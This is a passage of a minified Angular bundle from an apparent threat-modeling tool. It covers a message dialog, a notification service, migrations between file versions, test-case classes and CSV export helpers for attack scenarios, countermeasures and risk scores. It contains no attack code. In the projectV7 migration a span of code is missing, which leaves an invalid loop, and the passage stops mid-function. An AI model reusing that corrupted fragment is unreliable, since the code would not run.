tSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"error"),u()),2&t&&at("matTooltip",re(1,1,"general.Error"))}function iSe(t,a){if(1&t&&(m(0,"mat-list-item"),s(1,"\n "),ne(2,JRe,3,3,"mat-icon",8),s(3,"\n "),ne(4,ZRe,3,3,"mat-icon",8),s(5,"\n "),ne(6,eSe,3,3,"mat-icon",8),s(7,"\n "),ne(8,tSe,3,3,"mat-icon",8),s(9,"\n "),m(10,"div",9),s(11),u(),s(12,"\n "),m(13,"div",9),s(14),oe(15,"localDateTime"),u(),s(16,"\n "),u()),2&t){const e=a.$implicit;g(2),F("ngIf","info"==e.type),g(2),F("ngIf","success"==e.type),g(2),F("ngIf","warning"==e.type),g(2),F("ngIf","error"==e.type),g(3),ke(e.text),g(3),ke(re(15,6,e.time))}}function aSe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-chip-list",5),s(3,"\n "),m(4,"mat-chip",6),he("click",function(){be(e);const n=V();return Me(n.showError=!n.showError)}),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-chip",6),he("click",function(){be(e);const n=V();return Me(n.showWarning=!n.showWarning)}),s(9),oe(10,"translate"),u(),s(11,"\n "),m(12,"mat-chip",6),he("click",function(){be(e);const n=V();return Me(n.showSuccess=!n.showSuccess)}),s(13),oe(14,"translate"),u(),s(15,"\n "),m(16,"mat-chip",6),he("click",function(){be(e);const n=V();return Me(n.showInfo=!n.showInfo)}),s(17),oe(18,"translate"),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"mat-list"),s(22,"\n "),ne(23,iSe,17,8,"mat-list-item",7),s(24,"\n "),u(),s(25,"\n "),Mt()}if(2&t){const e=V();g(4),F("selected",e.showError),g(1),ke(re(6,9,"general.Error")),g(3),F("selected",e.showWarning),g(1),ke(re(10,11,"general.Warning")),g(3),F("selected",e.showSuccess),g(1),ke(re(14,13,"general.Success")),g(3),F("selected",e.showInfo),g(1),ke(re(18,15,"general.Info")),g(6),F("ngForOf",e.filteredMessages)}}function nSe(t,a){1&t&&(bt(0),s(1,"\n "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n "),Mt()),2&t&&(g(3),ke(re(4,1,"dialog.messages.noEntries")))}let oSe=(()=>{class t{constructor(e){this.messages=e,this.showError=!0,this.showWarning=!0,this.showSuccess=!0,this.showInfo=!0}get filteredMessages(){let e=this.messages;return this.showError||(e=e.filter(i=>"error"!=i.type)),this.showWarning||(e=e.filter(i=>"warning"!=i.type)),this.showSuccess||(e=e.filter(i=>"success"!=i.type)),this.showInfo||(e=e.filter(i=>"info"!=i.type)),e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-messages-dialog"]],decls:21,vars:12,consts:[["mat-dialog-title",""],[4,"ngIf"],["align","end"],["mat-button","",3,"mat-dialog-close"],["mat-button","","mat-dialog-close","","cdkFocusInitial",""],["multiple",""],["color","primary",3,"selected","click"],[4,"ngFor","ngForOf"],["mat-list-icon","",3,"matTooltip",4,"ngIf"],["mat-line",""],["mat-list-icon","",3,"matTooltip"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n "),ne(6,aSe,26,17,"ng-container",1),s(7,"\n "),ne(8,nSe,6,3,"ng-container",1),s(9,"\n"),u(),s(10,"\n"),m(11,"mat-dialog-actions",2),s(12,"\n "),m(13,"button",3),s(14),oe(15,"translate"),u(),s(16,"\n "),m(17,"button",4),s(18),oe(19,"translate"),u(),s(20,"\n"),u()),2&e&&(g(1),ke(re(2,6,"general.Messages")),g(5),F("ngIf",i.messages.length>0),g(2),F("ngIf",0==i.messages.length),g(5),F("mat-dialog-close",!0),g(1),ke(re(15,8,"general.Clear")),g(4),ke(re(19,10,"general.Close")))},dependencies:[Zi,Ri,oa,da,m8,db,ts,is,Or,Lr,Pa,vm,Am,Tm,Em,Xi,E5]}),t})(),A2=(()=>{class t{constructor(e,i,n,r){this.snackBar=e,this.translateService=i,this.locStorage=n,this.dialog=r,this.TIMEOUT=3e3,this.Messages=[],window.onerror=(c,d,T,k,q)=>(c.toString().startsWith("ResizeObserver loop")||this.Error(c.toString(),[d,T,k,q]),!1)}get ErrorMsgs(){return this.Messages.filter(e=>"error"==e.type)}get WarningMsgs(){return this.Messages.filter(e=>"warning"==e.type)}get SuccessMsgs(){return this.Messages.filter(e=>"success"==e.type)}get InfoMsgs(){return this.Messages.filter(e=>"info"==e.type)}get ShowErrors(){let e=this.locStorage.Get(si.MSG_SHOW_ERROR);return null==e||"true"==e}set ShowErrors(e){this.locStorage.Set(si.MSG_SHOW_ERROR,String(e))}get ShowWarnings(){let e=this.locStorage.Get(si.MSG_SHOW_WARNING);return null==e||"true"==e}set ShowWarnings(e){this.locStorage.Set(si.MSG_SHOW_WARNING,String(e))}get ShowSuccesses(){let e=this.locStorage.Get(si.MSG_SHOW_SUCCESS);return null==e||"true"==e}set ShowSuccesses(e){this.locStorage.Set(si.MSG_SHOW_SUCCESS,String(e))}get ShowInfos(){let e=this.locStorage.Get(si.MSG_SHOW_INFO);return null==e||"true"==e}set ShowInfos(e){this.locStorage.Set(si.MSG_SHOW_INFO,String(e))}get ShowUnsavedChanges(){let e=this.locStorage.Get(si.MSG_SHOW_UNSAVED_CHANGED);return null==e||"true"==e}set ShowUnsavedChanges(e){this.locStorage.Set(si.MSG_SHOW_UNSAVED_CHANGED,String(e))}Info(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"info",time:(new Date).toString()}),this.ShowInfos&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-info"})}Success(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"success",time:(new Date).toString()}),this.ShowSuccesses&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-success"})}Warning(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"warning",time:(new Date).toString()}),this.ShowWarnings&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-warning"})}Error(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"error",time:(new Date).toString()}),console.error(n),this.ShowErrors&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-error"})}UnsavedChanges(e,i){let n=this.buildMsg(e,i);this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-warning"})}ShowHistory(){this.dialog.open(oSe,{hasBackdrop:!0,data:this.Messages}).afterClosed().subscribe(i=>{i&&(this.Messages.length=0)})}buildMsg(e,i){let n="";try{n=this.translateService.instant(e)}catch(r){n=e}return i&&"string"==typeof i?n+=" "+i:i&&"Array"==this.getParamType(i)?(n+=" ",i.forEach(r=>{n+=String(r)+"; "}),n=n.substring(0,n.length-2)):i&&"Object"==this.getParamType(i)?n=n+"\n"+JSON.stringify(i,null,2):i&&(n+=" Unknown parameters, see console",console.log(i)),n}getParamType(e){return null===e?"null":void 0===e?"undefined":e.constructor==="test".constructor?"String":e.constructor===[].constructor?"Array":e.constructor==={}.constructor?"Object":""}}return t.\u0275fac=function(e){return new(e||t)(At(w1e),At(Sn),At(_r),At(vu))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),D5=(()=>{class t{constructor(e,i){this.messageService=e,this.translate=i,this.configUpdates=[this.configV2,this.configV3,this.configV4,this.configV5],this.projectUpdates=[this.projectV2,this.projectV3,this.projectV4,this.projectV5,this.projectV6,this.projectV7]}UpdateProjectFile(e){let i=this.UpdateConfigFile(e.config),n=this.updateFile(e,!1);return i=i||n,i}UpdateConfigFile(e){return this.updateFile(e,!0)}updateFile(e,i){const n=i?t.ConfigVersion:t.ProjectVersion,r=i?"Config":"Project",c=i?this.configUpdates:this.projectUpdates;if(e.Data.Version!=n){const d=e.Data.Version;try{for(let T=e.Data.Version+1;T<=n;T++)c[T-2](e),e.Data.Version=T;return setTimeout(()=>{this.messageService.Success(Gi.Format(this.translate.instant("messages.success.updated"+r),d.toString(),n.toString()))},1e3),!0}catch(T){setTimeout(()=>{this.messageService.Error(Gi.Format(this.translate.instant("messages.erorr.updateFailed"+r),d.toString(),n.toString()),T)},1e3)}}return!1}projectV2(e){e.systemThreats.forEach(i=>{const n=["Confidentiality","Integrity","Availability","Authorization","Authenticity","Non-repudiation","Auditability","Trustworthiness","Safety","Privacy","Compliance","Financial","Reputation","Customer Satisfcation","Production Process"];let r=[];for(const[c,d]of Object.entries(i.ImpactCats))1==d&&r.push(n.indexOf(c)+1);i.ImpactCats=r})}projectV3(e){let i=[];e.threatActors=[],e.threatSources.Sources.forEach(n=>{const r=Fo();e.threatActors.push({ID:r,Name:n.Name,Description:"",Likelihood:n.Likelihood,Motive:n.Motive}),i.push(r)}),delete e.threatSources.Sources,e.threatSources.sourceIDs=i}projectV4(e){let i=n=>{n.Note=n.Task,delete n.Task,n.IsChecked=n.IsDone,delete n.IsDone,n.Author="",n.Date="",n.ShowTimestamp=!1,n.HasCheckbox=!0};e.Data.Tasks&&e.Data.Tasks.forEach(n=>i(n)),e.mitigationProcesses&&e.mitigationProcesses.forEach(n=>{n.Tasks&&n.Tasks.forEach(r=>i(r))})}projectV5(e){e.threatMappings&&(t.renameKey(e,"threatMappings","attackScenarios"),e.attackScenarios.forEach(i=>{i.deviceThreatIDs&&t.renameKey(e,"deviceThreatIDs","systemThreatIDs")})),e.deviceThreats&&t.renameKey(e,"deviceThreats","systemThreats"),e.mitigationMappings&&t.renameKey(e,"mitigationMappings","countermeasures"),e.countermeasures&&e.countermeasures.forEach(i=>{i.threatMappingIDs&&t.renameKey(e,"threatMappingIDs","attackScenarioIDs")}),e.countermeasures&&e.countermeasures.forEach(i=>{t.renameKey(i,"mitigationID","controlID")})}projectV6(e){e.attackScenarios&&e.attackScenarios.forEach(i=>{i.Mapping&&i.Mapping.Threat&&t.renameKey(i.Mapping.Threat,"ThreatOriginID","AttackVectorID")})}projectV7(e){if(e.threatActors)for(let i=0;i{const r=e.config.assetGroups.find(c=>c.Name==n.Name);n.IsNewAsset=!r,n.IsNewAsset&&(n.Number=i.toString(),i+=1),n.associatedDataIDs&&n.associatedDataIDs.forEach(c=>{const d=e.myData.find(T=>T.ID==c);if(d){const T=e.config.myData.find(k=>k.Name==d.Name);d.IsNewAsset=!T,d.IsNewAsset&&(d.Number=i.toString(),i+=1)}})})}}configV2(e){e.attackVectors.forEach(i=>{let n=[];for(const[r,c]of Object.entries(i.ThreatIntroduced))1==c&&n.push(r);i.ThreatIntroduced=n,n=[];for(const[r,c]of Object.entries(i.ThreatExploited))1==c&&n.push(r);i.ThreatExploited=n}),e.threatCategories.forEach(i=>{const n=["Confidentiality","Integrity","Availability","Authorization","Authenticity","Non-repudiation","Auditability","Trustworthiness","Safety","Privacy","Compliance","Financial","Reputation","Customer Satisfcation","Production Process"];let r=[];for(const[c,d]of Object.entries(i.ImpactCats))1==d&&r.push(n.indexOf(c)+1);i.ImpactCats=r})}configV3(e){e.Data.mitigationLibraryID&&t.renameKey(e.Data,"mitigationLibraryID","controlLibraryID"),e.mitigations&&t.renameKey(e,"mitigations","controls"),e.mitigationGroups&&(t.renameKey(e,"mitigationGroups","controlGroups"),e.controlGroups.forEach(i=>{t.renameKey(i,"mitigationGroupIDs","controlGroupIDs"),t.renameKey(i,"mitigationIDs","controlIDs")}))}configV4(e){if(e.attackVectorGroups)return console.log("Failed previous update"),void(e.controls&&e.controls.forEach(i=>{t.renameKey(i,"mitigatedattackVectorIDs","mitigatedAttackVectorIDs")}));e.threatOrigins&&e.threatOriginGroups&&(t.renameKey(e,"threatOriginGroups","attackVectorGroups"),t.renameKey(e,"threatOrigins","attackVectors"),e.attackVectorGroups.forEach(i=>{t.renameKey(i,"threatOriginGroupIDs","attackVectorGroupIDs"),t.renameKey(i,"threatOriginIDs","attackVectorIDs")})),e.controls&&e.controls.forEach(i=>{t.renameKey(i,"mitigatedThreatOriginIDs","mitigatedAttackVectorIDs")}),e.threatRules&&e.threatRules.forEach(i=>{i.Mapping&&t.renameKey(i.Mapping,"ThreatOriginID","AttackVectorID")})}configV5(e){e.stencilThreatMnemonics&&e.stencilThreatMnemonics.forEach(i=>{i.Letters&&i.Letters.forEach(n=>{null==n.ID&&(n.ID=Fo())})})}static renameKey(e,i,n){e[n]=e[i],delete e[i]}}return t.ProjectVersion=7,t.ConfigVersion=5,t.\u0275fac=function(e){return new(e||t)(At(A2),At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();var zu=(()=>{return(t=zu||(zu={}))[t.NotSet=1]="NotSet",t[t.Pass=2]="Pass",t[t.Fail=3]="Fail",zu;var t})();class Qg{static GetKeys(){return[zu.NotSet,zu.Pass,zu.Fail]}static ToString(a){switch(a){case zu.NotSet:return"properties.testcasestate.NotSet";case zu.Pass:return"properties.testcasestate.Pass";case zu.Fail:return"properties.testcasestate.Fail";default:return console.error("Missing State in TestCaseStateUtil.ToString()",a),"Undefined"}}}class $g extends Ln{constructor(a,e,i){super(a),this.project=e,null==this.Status&&(this.Status=zu.NotSet),this.PreConditions||(this.PreConditions=[]),this.Steps||(this.Steps=[]),this.TestData||(this.TestData=[]),this.Summary||(this.Summary=[]),this.Images||(this.Images=[]),this.Data.linkedElementIDs||(this.Data.linkedElementIDs=[]),this.Data.linkedScenarioIDs||(this.Data.linkedScenarioIDs=[]),this.Data.linkedMeasureIDs||(this.Data.linkedMeasureIDs=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get PreConditions(){return this.Data.PreConditions}set PreConditions(a){this.Data.PreConditions=a}get Version(){return this.Data.Version}set Version(a){this.Data.Version=a}get Steps(){return this.Data.Steps}set Steps(a){this.Data.Steps=a}get TestData(){return this.Data.TestData}set TestData(a){this.Data.TestData=a}get Summary(){return this.Data.Summary}set Summary(a){this.Data.Summary=a}get Status(){return this.Data.Status}set Status(a){this.Data.Status=a}get Images(){return this.Data.Images}set Images(a){this.Data.Images=a}get LinkedElements(){let a=[];return this.Data.linkedElementIDs.forEach(e=>{let i=this.project.GetDFDElement(e);i||(i=this.project.GetComponent(e)),i&&a.push(i)}),a}set LinkedElements(a){this.Data.linkedElementIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedScenarios(){let a=[];return this.Data.linkedScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set LinkedScenarios(a){this.Data.linkedScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedMeasures(){let a=[];return this.Data.linkedMeasureIDs.forEach(e=>a.push(this.project.GetCountermeasure(e))),a}set LinkedMeasures(a){this.Data.linkedMeasureIDs=null==a?void 0:a.map(e=>e.ID)}AddLinkedElement(a){this.LinkedElements.includes(a)||this.Data.linkedElementIDs.push(a.ID)}RemoveLinkedElement(a){const e=this.Data.linkedElementIDs.indexOf(a);e>=0&&this.Data.linkedElementIDs.splice(e,1)}AddLinkedAttackScenario(a){this.LinkedScenarios.includes(a)||this.Data.linkedScenarioIDs.push(a.ID)}RemoveLinkedAttackScenario(a){const e=this.Data.linkedScenarioIDs.indexOf(a);e>=0&&this.Data.linkedScenarioIDs.splice(e,1)}AddLinkedCountermeasure(a){this.LinkedMeasures.includes(a)||this.Data.linkedMeasureIDs.push(a.ID)}RemoveLinkedCountermeasure(a){const e=this.Data.linkedMeasureIDs.indexOf(a);e>=0&&this.Data.linkedMeasureIDs.splice(e,1)}GetViewOfLinkedElement(a){let e=this.project.FindDiagramOfElement(a.ID);return e||(e=this.project.GetStacks().find(i=>i.GetChildrenFlat().some(n=>n.ID==a.ID))),e}CheckUniqueNumber(){return this.project.GetTestCases().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"TC"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){a.GetTesting().RemoveTestCase(this)}static FromJSON(a,e,i){return new $g(a,e,i)}}class fM extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.testCaseIDs||(this.Data.testCaseIDs=[])}get TestCases(){let a=[];return this.Data.testCaseIDs.forEach(e=>a.push(this.project.GetTestCase(e))),a}set TestCases(a){this.Data.testCaseIDs=null==a?void 0:a.map(e=>e.ID)}AddTestCase(a){this.TestCases.includes(a)||this.Data.testCaseIDs.push(a.ID)}RemoveTestCase(a){this.TestCases.includes(a)&&this.Data.testCaseIDs.splice(this.Data.testCaseIDs.indexOf(a.ID),1)}FindReferences(a,e){const i=[];return null==a||a.GetTestCases().forEach(n=>i.push({Type:li.DeleteTestCase,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteTestCase&&a.DeleteTestCase(n.Param)})}static FromJSON(a,e,i){return new fM(a,e,i)}}var jo=(()=>{return(t=jo||(jo={}))[t.AttackScenarios=1]="AttackScenarios",t[t.Countermeasures=2]="Countermeasures",t[t.SystemThreats=3]="SystemThreats",t[t.ThreatSources=4]="ThreatSources",t[t.MitigationProcesses=5]="MitigationProcesses",t[t.TestCases=6]="TestCases",jo;var t})();let Gn=(()=>{class t{}return t.wrap=(a,e)=>e?"string"==typeof e?[e.replace(/\n/g,"; ").replace(/"/g,'""')]:"number"==typeof e&&"de"==a.currentLang?[e.toString().replace(".",",")]:[e]:[""],t})();class PG{static GetKeys(){return[jo.AttackScenarios,jo.Countermeasures,jo.MitigationProcesses,jo.SystemThreats,jo.ThreatSources,jo.TestCases]}static ToString(a){switch(a){case jo.AttackScenarios:return"exporttype.AttackScenarios";case jo.Countermeasures:return"exporttype.Countermeasures";case jo.MitigationProcesses:return"exporttype.MitigationProcesses";case jo.SystemThreats:return"exporttype.SystemThreats";case jo.ThreatSources:return"exporttype.ThreatSources";case jo.TestCases:return"exporttype.TestCases";default:return console.error("Missing Export Type in ExportTypeUtil.ToString()"),"Undefined"}}}var Ol=(()=>{return(t=Ol||(Ol={}))[t.All=0]="All",t[t.Applicable=1]="Applicable",t[t.NotApplicable=2]="NotApplicable",Ol;var t})();class OG{static GetKeys(){return[Ol.All,Ol.Applicable,Ol.NotApplicable]}static ToString(a){switch(a){case Ol.All:return"exportfilters.All";case Ol.Applicable:return"exportfilters.Applicable";case Ol.NotApplicable:return"exportfilters.NotApplicable";default:return console.error("Missing Filter in ExportFilterUtil.ToString()"),"Undefined"}}}var Kg=(()=>{return(t=Kg||(Kg={})).Name="Name",t.Description="Description",Kg;var t})();class Yo{static GetKeys(){return[Kg.Name,Kg.Description]}static GetValue(a,e){if(!e)return"";let i=e[a];return i||(i=e.Data[a]),i}static ToString(a){switch(a){case Kg.Name:return"general.Name";case Kg.Description:return"properties.Description";default:return console.error("Missing Prop in ExportCommonPropertyUtil.ToString()"),"Undefined"}}}var ma=(()=>{return(t=ma||(ma={})).Number="Number",t.ThreatState="ThreatState",t.AttackVector="AttackVector",t.Targets="Targets",t.ThreatCategories="ThreatCategories",t.SystemThreats="SystemThreats",t.ThreatSources="ThreatSources",t.Diagram="Diagram",t.VectorCVSS="VectorCVSS",t.ScoreCVSS="ScoreCVSS",t.VectorOwaspRR="VectorOwaspRR",t.ScoreOwaspRR="ScoreOwaspRR",t.Severity="Severity",t.SeverityReason="SeverityReason",t.Likelihood="Likelihood",t.LikelihoodReason="LikelihoodReason",t.Risk="Risk",t.RiskReason="RiskReason",t.RiskStrategy="RiskStrategy",t.RiskStrategyReason="RiskStrategyReason",t.Countermeasures="Countermeasures",t.MyTags="MyTags",ma;var t})();class bT{static GetKeys(){return[ma.Number,ma.ThreatState,ma.AttackVector,ma.Targets,ma.Diagram,ma.ThreatCategories,ma.SystemThreats,ma.ThreatSources,ma.VectorCVSS,ma.ScoreCVSS,ma.VectorOwaspRR,ma.ScoreOwaspRR,ma.Severity,ma.SeverityReason,ma.Likelihood,ma.LikelihoodReason,ma.Risk,ma.RiskReason,ma.RiskStrategy,ma.RiskStrategyReason,ma.Countermeasures,ma.MyTags]}static GetValues(a,e,i){var n,r;if(null==e)return[""];const c=d=>{const T=Yo.GetValue(a,e);return T?Gn.wrap(i,d(T)):[""]};if(this.GetKeys().includes(a)){if([ma.Targets,ma.ThreatCategories,ma.SystemThreats,ma.ThreatSources,ma.MyTags].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(d=>Yo.GetValue("Name",d)).join("; "));if([ma.AttackVector].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if(a==ma.ThreatState)return c(ku.ToString);if(a==ma.VectorCVSS){const d=Wm.GetVector(e.ScoreCVSS);return Gn.wrap(i,(null==d?void 0:d.length)>8?d:"")}if(a==ma.ScoreCVSS){let d=Yo.GetValue(a,e);return d&&(d=d.Score),Gn.wrap(i,d)}if(a==ma.VectorOwaspRR)return Gn.wrap(i,Wm.GetVector(e.ScoreOwaspRR));if(a==ma.ScoreOwaspRR){let d=Yo.GetValue(a,e);return Gn.wrap(i,d?vn.ToString(d.Score):d)}if([ma.Severity,ma.Risk].includes(a))return c(vn.ToString);if([ma.Likelihood].includes(a))return c(An.ToString);if(a==ma.RiskStrategy)return c(fT.ToString);if(a==ma.Diagram)return Gn.wrap(i,e.GetDiagram().Name);if(a==ma.Countermeasures)return Gn.wrap(i,null===(r=e.GetCountermeasures())||void 0===r?void 0:r.map(d=>d.GetLongName()).join("; "))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case ma.Number:return"general.Number";case ma.ThreatState:return"properties.Status";case ma.AttackVector:return"general.AttackVector";case ma.Targets:return"general.Targets";case ma.ThreatCategories:return"general.ThreatCategories";case ma.SystemThreats:return"general.SystemThreats";case ma.ThreatSources:return"general.ThreatSources";case ma.Diagram:return"general.Diagram";case ma.VectorCVSS:return"report.CvssVector";case ma.ScoreCVSS:return"report.CvssScore";case ma.VectorOwaspRR:return"report.OwaspRRVector";case ma.ScoreOwaspRR:return"report.OwaspRRScore";case ma.Severity:return"properties.Severity";case ma.SeverityReason:return"properties.SeverityReason";case ma.Likelihood:return"general.Likelihood";case ma.LikelihoodReason:return"properties.LikelihoodReason";case ma.Risk:return"properties.Risk";case ma.RiskReason:return"properties.RiskReason";case ma.RiskStrategy:return"properties.RiskStrategy";case ma.RiskStrategyReason:return"properties.RiskStrategyReason";case ma.Countermeasures:return"general.Countermeasures";case ma.MyTags:return"general.Tags";default:return console.error("Missing Prop in ExportAttackScenarioPropertyUtil.ToString()"),"Undefined"}}}var go=(()=>{return(t=go||(go={})).Number="Number",t.MappingState="MappingState",t.Control="Control",t.Targets="Targets",t.Diagram="Diagram",t.AttackScenarios="AttackScenarios",t.MaxSeverity="MaxSeverity",t.MaxRisk="MaxRisk",t.AttackVectors="AttackVectors",t.MitigationProcess="MitigationProcess",t.MyTags="MyTags",go;var t})();class MT{static GetKeys(){return[go.Number,go.MitigationProcess,go.Control,go.Targets,go.Diagram,go.AttackScenarios,go.MaxSeverity,go.MaxRisk,go.AttackVectors,go.MitigationProcess,go.MyTags]}static GetValues(a,e,i){var n,r,c,d,T;if(this.GetKeys().includes(a)){if([go.Targets,go.AttackVectors,go.MyTags].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(q=>Yo.GetValue("Name",q)).join("; "));if([go.AttackScenarios].includes(a))return Gn.wrap(i,null===(r=e[a])||void 0===r?void 0:r.map(q=>q.GetLongName()).join("; "));if([go.Control].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if([go.MitigationProcess].includes(a))return Gn.wrap(i,null===(c=e[a])||void 0===c?void 0:c.GetLongName());if(a==go.MitigationProcess)return(q=>{const Y=Yo.GetValue(a,e);return Y?Gn.wrap(i,q(Y)):[""]})(Sl.ToString);if(a==go.Diagram)return Gn.wrap(i,e.GetDiagram().Name);if([go.MaxSeverity].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(d=e.AttackScenarios)||void 0===d?void 0:d.map(q=>q.Severity).filter(q=>q&&q>0))));if([go.MaxRisk].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(T=e.AttackScenarios)||void 0===T?void 0:T.map(q=>q.Risk).filter(q=>q&&q>0))))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case go.Number:return"general.Number";case go.MappingState:return"properties.Status";case go.Control:return"general.Control";case go.Targets:return"general.Targets";case go.Diagram:return"general.Diagram";case go.AttackScenarios:return"general.AttackScenarios";case go.MaxSeverity:return"exportprops.MaxSeverity";case go.MaxRisk:return"exportprops.MaxRisk";case go.AttackVectors:return"general.AttackVectors";case go.MitigationProcess:return"general.MitigationProcess";case go.MyTags:return"general.Tags";default:return console.error("Missing Prop in ExportCountermeasurePropertyUtil.ToString()"),"Undefined"}}}var Jo=(()=>{return(t=Jo||(Jo={})).Number="Number",t.ProcessState="MitigationProcessState",t.Progress="Progress",t.Countermeasures="Countermeasures",t.AttackScenarios="AttackScenarios",t.MaxSeverity="MaxSeverity",t.MaxRisk="MaxRisk",t.Tasks="Tasks",t.Notes="Notes",Jo;var t})();class vT{static GetKeys(){return[Jo.Number,Jo.ProcessState,Jo.Progress,Jo.Countermeasures,Jo.AttackScenarios,Jo.MaxSeverity,Jo.MaxRisk,Jo.Tasks,Jo.Notes]}static GetValues(a,e,i){var n,r,c,d,T;if(this.GetKeys().includes(a)){if([Jo.Countermeasures].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(q=>q.GetLongName()).join("; "));if([Jo.AttackScenarios].includes(a))return Gn.wrap(i,null===(r=e.Countermeasures)||void 0===r?void 0:r.map(q=>q.AttackScenarios).flat().map(q=>q.GetLongName()).join("; "));if([Jo.MaxSeverity].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(c=e.Countermeasures)||void 0===c?void 0:c.map(q=>q.AttackScenarios).flat().map(q=>q.Severity).filter(q=>q&&q>0))));if([Jo.MaxRisk].includes(a))return Gn.wrap(i,vn.ToString(Math.max(...null===(d=e.Countermeasures)||void 0===d?void 0:d.map(q=>q.AttackScenarios).flat().map(q=>q.Risk).filter(q=>q&&q>0))));if(a==Jo.ProcessState)return(q=>{const Y=Yo.GetValue(a,e);return Y?Gn.wrap(i,q(Y)):[""]})(C2.ToString);if(a==Jo.Progress)return Gn.wrap(i,Yo.GetValue(a,e)+"%");if([Jo.Tasks,Jo.Notes].includes(a))return null===(T=e[a])||void 0===T?void 0:T.map(q=>q.Note)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case Jo.Number:return"general.Number";case Jo.ProcessState:return"properties.Status";case Jo.Progress:return"general.Progress";case Jo.Countermeasures:return"general.Countermeasures";case Jo.AttackScenarios:return"general.AttackScenarios";case Jo.MaxSeverity:return"exportprops.MaxSeverity";case Jo.MaxRisk:return"exportprops.MaxRisk";case Jo.Tasks:return"general.Tasks";case Jo.Notes:return"general.Notes";default:return console.error("Missing Prop in ExportMitigationProcessProperties.ToString()"),"Undefined"}}}var kc=(()=>{return(t=kc||(kc={})).Number="Number",t.Impact="Impact",t.ImpactCats="ImpactCats",t.ThreatCategory="ThreatCategory",t.AffectedAssetObjects="AffectedAssetObjects",kc;var t})();class AT{static GetKeys(){return[kc.Number,kc.Impact,kc.ImpactCats,kc.ThreatCategory,kc.AffectedAssetObjects]}static GetValues(a,e,i){var n,r;if(this.GetKeys().includes(a)){if([kc.AffectedAssetObjects].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.map(d=>Yo.GetValue("Name",d)).join("; "));if([kc.ThreatCategory].includes(a))return Gn.wrap(i,Yo.GetValue("Name",e[a]));if([kc.Impact].includes(a))return(d=>{const T=Yo.GetValue(a,e);return T?Gn.wrap(i,d(T)):[""]})(An.ToString);if(a==kc.ImpactCats)return Gn.wrap(i,null===(r=e[a])||void 0===r?void 0:r.map(d=>i.instant(Vs.ToString(d))).join("; "))}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case kc.Impact:return"properties.Impact";case kc.ImpactCats:return"properties.ImpactCategories";case kc.ThreatCategory:return"general.ThreatCategory";case kc.AffectedAssetObjects:return"report.AffectedAssets";default:return console.error("Missing Prop in ExportSystemThreatPropertyUtil.ToString()"),"Undefined"}}}var id=(()=>{return(t=id||(id={})).Number="Number",t.Motive="Motive",t.Capabilities="Capabilities",t.Likelihood="Likelihood",id;var t})();class TT{static GetKeys(){return[id.Number,id.Motive,id.Capabilities,id.Likelihood]}static GetValues(a,e,i){var n;if(this.GetKeys().includes(a)){if([id.Motive,id.Capabilities].includes(a))return Gn.wrap(i,null===(n=e[a])||void 0===n?void 0:n.join("; "));if([id.Likelihood].includes(a))return(c=>{const d=Yo.GetValue(a,e);return d?Gn.wrap(i,c(d)):[""]})(An.ToString)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case id.Motive:return"properties.Motive";case id.Capabilities:return"properties.Capabilities";case id.Likelihood:return"properties.Likelihood";default:return console.error("Missing Prop in ExportThreatSourcePropertyUtil.ToString()"),"Undefined"}}}var $r=(()=>{return(t=$r||($r={})).Number="Number",t.Status="Status",t.Version="Version",t.PreConditions="PreConditions",t.Steps="Steps",t.TestData="TestData",t.Summary="Summary",$r;var t})();class ET{static GetKeys(){return[$r.Number,$r.Status,$r.Version,$r.PreConditions,$r.Steps,$r.TestData,$r.Summary]}static GetValues(a,e,i){var n;if(this.GetKeys().includes(a)){if([$r.PreConditions,$r.Steps,$r.TestData].includes(a))return e[a];if([$r.Summary].includes(a))return null===(n=e[a])||void 0===n?void 0:n.map(c=>c.Note);if(a==$r.Status)return(c=>{const d=Yo.GetValue(a,e);return 